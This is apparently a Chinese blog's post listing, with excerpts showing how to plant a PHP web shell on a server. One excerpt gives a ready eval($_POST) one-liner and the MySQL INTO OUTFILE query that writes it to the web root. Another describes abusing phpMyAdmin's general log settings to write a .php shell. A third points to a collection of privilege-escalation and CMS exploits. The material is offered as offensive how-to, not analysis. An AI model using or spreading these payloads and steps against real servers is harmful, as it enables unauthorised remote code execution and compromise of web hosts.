- 博客(3)
- 收藏
- 关注
RSS订阅原创 mysql写入一句话木马
前提:root权限,知道了服务器的web的绝对路径,尝试写入一句话mysql查询语句执行:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\Wamp\2.php"注意事项:1、绝对路径的猜解2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
2018-07-16 17:51:15
10758
4
原创 phpmyadmin利用日志文件写入一句话
前提:root权限,已经进入了phpmyadmin后台1、首先进入phpmyadmin后台,查看genelog变量,更改general log和general log file参数,初始设置general log是OFF,我们将其改成ON;general log file我们将其改成我们特定的目录文件,我这里写成D:\phpStudy\WWW\test1.php 2...
2018-07-16 17:36:38
8467
原创 EXP完美收集
强烈推荐这个github,https://github.com/SecWiki1、windows-kernel-exploites windows平台提权漏洞集合2、linux-kernel-exploites Linux平台提权漏洞集合3、蜜罐4、CMS漏洞测试用例集合...
2018-07-16 17:30:27
1521
网络安全攻防+web常见系统收集关键字
2023-06-23
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人